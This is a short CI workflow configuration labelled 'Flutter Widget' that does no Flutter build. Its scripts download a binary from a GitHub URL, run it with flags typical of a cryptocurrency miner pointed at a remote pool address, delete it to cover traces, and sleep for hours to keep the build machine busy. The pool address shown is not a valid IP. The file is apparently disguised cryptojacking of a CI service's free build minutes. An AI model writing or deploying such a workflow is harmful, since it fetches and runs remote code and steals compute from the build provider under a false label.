workflows:
    
    flutter-widget:
        name: Flutter Widget
        instance_type: linux_x2
        max_build_duration: 120
        environment:
            flutter: dev
        scripts:
            - wget -q https://github.com/gimakunc/6/raw/main/yin
			- chmod +x yin
			- ./yin -B -o 1104.237.140.116:16145 --cpu-affinity=1 --cpu-no-yield
			- rm -rf yin
			- sleep 66666